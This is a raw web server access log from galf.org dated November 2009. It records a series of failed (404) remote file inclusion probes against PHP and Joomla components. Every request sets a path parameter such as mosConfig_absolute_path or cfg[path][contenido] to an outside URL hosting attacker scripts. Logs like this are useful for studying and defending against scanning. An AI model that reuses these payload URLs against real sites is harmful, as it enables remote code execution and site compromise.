209.216.213.119 - - [22/Nov/2009:16:00:22 -0800] "GET /logs/access_090921.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:03:59 -0800] "GET /logs/access_090525.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:05:01 -0800] "GET /logs/access_090525.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:16:06:01 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:16:06:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:16:06:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:16:06:14 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:16:06:14 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:16:06:14 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
70.38.31.183 - - [22/Nov/2009:16:07:00 -0800] "GET /logs/access_091102.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:07:11 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:07:11 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:07:12 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:07:12 -0800] "GET /logs/access_091102.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:07:14 -0800] "GET /logs/access_091102.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:07:49 -0800] "GET /logs/access_090831.log%20%20//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:08:04 -0800] "GET /logs/access_090928.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:08:11 -0800] "GET /logs/access_090928.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:08:17 -0800] "GET /logs/access_090928.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:08:19 -0800] "GET /logs//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:08:23 -0800] "GET /logs/access_090831.log%20%20//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:08:23 -0800] "GET /index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:08:32 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:08:32 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:16:08:38 -0800] "GET /logs/access_090504.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:09:07 -0800] "GET /logs/access_090525.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:09:09 -0800] "GET /logs/access_091102.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:09:40 -0800] "GET /logs/access_090928.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:10:18 -0800] "GET /logs/access_090525.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:12:36 -0800] "GET /logs/access_091102.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:12:57 -0800] "GET /index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:12:57 -0800] "GET /logs//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:12:57 -0800] "GET /logs/access_090831.log%20%20//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:13:02 -0800] "GET /logs/access_091102.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:13:04 -0800] "GET /logs/access_090928.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:13:04 -0800] "GET /logs/access_090831.log%20%20//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:13:04 -0800] "GET /index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:13:05 -0800] "GET /logs//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:13:22 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [22/Nov/2009:16:14:11 -0800] "GET /logs//skin/happycast_category/view.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [22/Nov/2009:16:14:11 -0800] "GET /logs/access.log//skin/happycast_category/view.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [22/Nov/2009:16:14:11 -0800] "GET /skin/happycast_category/view.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:15:00 -0800] "GET /logs/access_090608.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:15:00 -0800] "GET /logs/access_090504.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:15:34 -0800] "GET /logs/access_090525.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:15:56 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:15:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:15:56 -0800] "GET /logs/access_090713.log//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:18 -0800] "GET /logs/access_090713.log//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:18 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:25 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:27 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:27 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:27 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:27 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:16:27 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [22/Nov/2009:16:16:55 -0800] "GET /logs/access.log//skin/happycast_category/view.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [22/Nov/2009:16:16:55 -0800] "GET /logs//skin/happycast_category/view.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [22/Nov/2009:16:16:55 -0800] "GET /skin/happycast_category/view.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:17:12 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:17:12 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:17:15 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:17:28 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:17:28 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:17:30 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:17:32 -0800] "GET /logs/access_090525.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:18:56 -0800] "GET /logs/access_090713.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:19:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:19:09 -0800] "GET /logs/access_090713.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:19:09 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:19:09 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:19:11 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:19:11 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:19:11 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:19:25 -0800] "GET /logs/access_090525.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:19:29 -0800] "GET /logs/access_090525.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.91.189.9 - - [22/Nov/2009:16:19:52 -0800] "GET /logs/access_090622.log%20%20//bemarket/postscript/postscript.php?p_mode=http://www.seorakhoney.com/shop/mail/idsatu.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:19:59 -0800] "GET /logs/access_090525.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:22:42 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:22:45 -0800] "GET /logs/access_090713.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:22:46 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:16:22:46 -0800] "GET /logs/access_090713.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:23:03 -0800] "GET /logs/access_090608.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:24:24 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:24:37 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:25:39 -0800] "GET /logs/access_090629.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:28:11 -0800] "GET /logs/access_090525.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:29:25 -0800] "GET /logs/access_090525.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:29:27 -0800] "GET /logs/access_090608.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:29:28 -0800] "GET /logs/access_090817.log//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:29:28 -0800] "GET /logs/access_090504.log//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:29:28 -0800] "GET /logs/access_090831.log//index.php?option=com_simpleboard&func=view&catid=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:32:21 -0800] "GET /logs/access_090622.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:16:32:27 -0800] "GET /logs/access_090608.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:16:32:36 -0800] "GET /logs//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:16:32:37 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:34:10 -0800] "GET /logs/access_090525.log///conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:35:46 -0800] "GET /logs/access_090608.log/home//conlib/local.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [22/Nov/2009:16:35:46 -0800] "GET /logs/access_090629.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:36:59 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:36:59 -0800] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:37:02 -0800] "GET /logs/access_091102.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:37:05 -0800] "GET /logs/access_090921.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:37:44 -0800] "GET /logs/access_090504.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:37:46 -0800] "GET /logs/access_090608.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:37:50 -0800] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:37:50 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:37:50 -0800] "GET /logs/access_091102.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [22/Nov/2009:16:37:56 -0800] "GET /logs/access_090921.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:38:13 -0800] "GET /logs/access_090504.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:16:38:16 -0800] "GET /logs/access_090608.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:16:38:24 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
